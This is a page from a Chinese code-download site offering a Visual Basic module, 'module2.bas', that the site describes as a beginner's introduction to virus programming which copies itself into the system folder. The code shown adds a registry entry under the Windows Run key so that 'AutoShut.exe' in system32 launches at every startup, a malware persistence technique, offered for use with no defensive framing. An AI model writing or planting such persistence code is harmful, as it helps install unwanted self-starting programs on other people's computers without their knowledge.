⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 module2.bas

📁 该程序可用于初学病毒编程的入门,先复制本身到系统system中
💻 BAS
字号:
Attribute VB_Name = "Module2"
Public Function regedit()
Dim hKey As Long, SubKey As String, Exe As String
        SubKey = "Software\Microsoft\Windows\CurrentVersion\Run"
        Exe = ("c:\windows\system32\AutoShut.exe")
        RegCreateKey HKEY_LOCAL_MACHINE, SubKey, hKey
        RegSetValueEx hKey, "Shut", 0, REG_SZ, ByVal Exe, LenB(StrConv(Exe, vbFromUnicode)) + 1
        RegCloseKey hKey
End Function

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -